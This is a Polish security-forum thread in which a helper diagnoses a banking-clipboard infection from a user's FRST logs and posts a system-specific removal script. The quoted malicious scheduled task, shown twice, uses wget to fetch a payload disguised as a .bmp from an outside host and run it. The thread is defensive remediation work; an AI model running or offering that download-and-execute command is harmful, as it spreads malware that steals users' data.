elmariaci Opublikowano 13 Listopada 2015 Zgłoś Udostępnij Opublikowano 13 Listopada 2015 Witam, jak w temacie gdy próbuję wybrać kursorem myszki jakiś jeden folder to zaznaczana jest większa ilość, również maksymalizowanie okienek jest niemożliwe w klawiaturze występuje problem z literami i brakiem reakcji na przyciski specjalne jak np "flaga Widowsa" lub sterowania muzyką, natomiast z litery po wklepaniu są tylko duże pomimo wyłączonego Caps locka, diody na klawiaturze się nie świecą. W załączniku dołączam pliki z FRST wykonane według instrukcji. Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 14 Listopada 2015 Zgłoś Udostępnij Opublikowano 14 Listopada 2015 W systemie działa infekcja podobna do VBKlip/Banatrix: Task: {10AE26B4-A3E9-4E70-B329-E9BE2629AEE2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Y3jnlP7sDo;Counter_Strike_1.6_v23.exe;1437684586 & start cmd /R dat.bmp Ta infekcja manipuluje ze schowkiem, więc pewne objawy mogą się zazębiać, ale nie wszystkie. Na razie usuń infekcję i zobaczymy co z tego wyniknie: 1. Odinstaluj szczątkowe śmieci DAEMON Tools Toolbar, Incredibar Toolbar on IE, vShare.tv plugin 1.3 oraz przestarzały Spybot - Search & Destroy. Jeśli śmieci nie będzie widać, kontynuuj dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {08E9B500-765C-49B8-8A79-AA8A18C6C0BF} - System32\Tasks\{7A4A6E52-80AE-416E-8DD4-038ACFBD66B2} => C:\AVAST Software\Avast\AvastUI.exe Task: {10AE26B4-A3E9-4E70-B329-E9BE2629AEE2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Y3jnlP7sDo;Counter_Strike_1.6_v23.exe;1437684586 & start cmd /R dat.bmp Task: {2EBDD549-FA78-4C17-9A95-F09F9CA73C36} - System32\Tasks\e-pity2015_styczen => C:\Program Files\e-file\e-pity2014\Assets\signxml.exe Task: {2FA962EE-C1E9-41B9-B72E-FDC792FE6708} - System32\Tasks\{73FD8A8F-060C-4AAF-92BD-B62C4F9223D5} => pcalua.exe -a F:\CDSETUP.EXE -d F:\ Task: {3B0F575F-B62D-4C6E-A079-D6EA36911DD6} - System32\Tasks\e-pity2013_styczen => C:\Program Files\e-file\e-pity2013\Assets\signxml.exe Task: {5E4C995A-C506-4392-9E66-B2C795D25D86} - System32\Tasks\{EAB91018-14A0-4858-ABBD-60CD613C0720} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{8C3727F2-8E37-49E4-820C-03B1677F53B6}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {687091B6-D1F9-4CBF-A341-666E9DF6BB07} - System32\Tasks\{1E57334B-7E41-49EC-AFFE-1B3E069FFBE4} => pcalua.exe -a "C:\Program Files\Common Files\DVDVideoSoft\lib\Uninstall.exe" Task: {91E8FC8B-40C2-4DFC-8AB6-6F934BCDD4C7} - System32\Tasks\e-pity2013_kwiecien => C:\Program Files\e-file\e-pity2013\Assets\signxml.exe Task: {ACB981AF-55E8-4F9B-8650-71CA08F1128F} - System32\Tasks\{F30E8CEC-1395-4794-8170-E4AEB6CFEBF7} => pcalua.exe -a C:\Users\Maciej\Desktop\RegCleaner(dobreprogramy.pl).exe -d C:\Users\Maciej\Desktop Task: {D03AC7C9-2096-408F-A0B1-AD17D9F123E3} - System32\Tasks\{5FAFB038-351B-404D-A0AE-58D3D1A91379} => C:\AVAST Software\Avast\AvastUI.exe Task: {E1E5641B-4E3B-47DD-96F8-4564CB514D89} - System32\Tasks\{929CADC3-B236-42AE-A6F5-4563779DF969} => pcalua.exe -a C:\Pobieranie\Sony_Ericsson_Drivers_3.5.3.0.exe -d "C:\Mozilla Firefox" Task: {EB3FACC2-2AE0-4327-A755-4F7AF2C4B2F0} - System32\Tasks\e-pity2015_kwiecien => C:\Program Files\e-file\e-pity2014\Assets\signxml.exe Task: {F9E7B691-A630-4E30-97A9-B633C665AB79} - System32\Tasks\{49EB771A-4865-44EA-93B4-5B59FABA6457} => pcalua.exe -a C:\Pobieranie\CBuilder6Personal\INSTALL.EXE -d C:\Pobieranie\CBuilder6Personal S3 Cardex; \??\C:\Windows\system32\drivers\TBPANEL.SYS [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X] HKU\S-1-5-21-227159230-626954009-1044769965-1000\...\Run: [AVG-Secure-Search-Update_0913b] => C:\Users\Maciej\AppData\Roaming\AVG 0913b Campaign\AVG-Secure-Search-Update-0913b.exe /PROMPT --mid 841e7423ac6f47d0a35ed154d43bfa55-d1113e44ae21302e57bdbc3bdf4438affb0710ff --CMPID 0913b ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Maciej\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Maciej\AppData\Local\Google\Update\1.3.21.115\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Maciej\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Maciej\AppData\Local\Google\Update\1.3.21.111\psuser.dll => Brak pliku BootExecute: autocheck autochk * /sync /restart /sync /restart /sync /restartsdnclean.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-227159230-626954009-1044769965-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_05-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab FF Plugin HKU\S-1-5-21-227159230-626954009-1044769965-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Maciej\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [brak pliku] FF HKLM\...\Firefox\Extensions: [{ACAA314B-EEBA-48e4-AD47-84E31C44796C}] - C:\Program Files\Common Files\DVDVideoSoft\plugins\ff FF HKLM\...\Firefox\Extensions: [pdf_architect_3_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 3\resources\pdfarchitect3firefoxextension CHR StartupUrls: Default -> "hxxp://do-search.com/?type=hp&ts=1430335197&from=cor&uid=ST3500320AS_9QM2ZQMQXXXX9QM2ZQMQ" C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autonomiczny składnik AVG LinkScanner C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft\Programs\Free YouTube to iPod Converter.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OCCT C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice.org 3.4.1 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QPrinter Bookmaker C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RAR Password Recovery C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sierra C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XTCS Counter-Strike 1.6 Final Release C:\Users\Gość\AppData\Local\Microsoft\Windows\GameExplorer\{F86210CB-EE92-4C63-8D4D-A266B34FC82B} C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Gość\Desktop\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Maciej\AppData\Local\*.html C:\Users\Maciej\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Maciej\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Maciej\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Maciej\AppData\Roaming\Microsoft\Office\Niedawny\*.LNK C:\Users\UpdatusUser\Desktop\*.lnk C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*.lnk C:\Windows\pss\Secunia PSI Tray.lnk.CommonStartup CMD: netsh advfirewall reset Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AVG_TRAY" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FixMyRegistry" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesHelper" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesPDLR" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesTrayAgent" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OrderReminder" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QPrinter 2.0 monitor" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Samsung_AppInst" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SDTray" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SpeedUpMyComputer" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\vProt" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się które objawy nadal mają miejsce. Odnośnik do komentarza
elmariaci Opublikowano 16 Listopada 2015 Autor Zgłoś Udostępnij Opublikowano 16 Listopada 2015 Dzięki za pomoc, póki co nic się nie dzieje więc już chyba problemy zostały rozwiązane Addition.txt Fixlog.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 16 Listopada 2015 Zgłoś Udostępnij Opublikowano 16 Listopada 2015 Wszystko pomyślnie wykonane. Drobne poprawki na szczątki po odinstalowanym Spybocie. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-227159230-626954009-1044769965-1000\...\Run: [spybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) HKU\S-1-5-18\...\Run: [spybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) Task: {5D9E9CBB-5556-4E79-BA73-FFE754F40E40} - System32\Tasks\Spybot - Search & Destroy - Scheduled Task => C:\Spybot - Search & Destroy\SpybotSD.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Common Files\AV\Spybot - Search and Destroy Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tymrazem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Odnośnik do komentarza
elmariaci Opublikowano 16 Listopada 2015 Autor Zgłoś Udostępnij Opublikowano 16 Listopada 2015 wszystko wykonane jeszcze raz wielkie dzięki za pomoc Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 16 Listopada 2015 Zgłoś Udostępnij Opublikowano 16 Listopada 2015 1. Jakoś pominęłam odpadkowy DAEMON Tools Toolbar nadal widoczny na liście. Ostatnia poprawka do FRST: DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DAEMON Tools Toolbar 2. Skasuj FRST i jego logi z folderu C:\Pobieranie. Następnie zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Zaktualizuj systemowy IE8 do wersji IE11, nawet jeśli z niego nie korzystasz. 4. Nie jestem pewna co "łowiła" infekcja. Na wszelki wypadek zmień hasła w ważnych serwisach (bank, poczta, etc). Odnośnik do komentarza
elmariaci Opublikowano 30 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 30 Grudnia 2015 Witam, niestety odświeżam temat gdyż znowu pojawiły się wcześniej wymienione objawy tzn.gdy próbuję wybrać kursorem myszki jakiś jeden folder to zaznaczana jest większa ilość, również maksymalizowanie okienek jest niemożliwe brak dostępu do menadżera zadań, po wciśnięciu kombinacji klawiszy zero reakcji. W załączniku dołączam pliki z FRST wykonane według instrukcji. Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się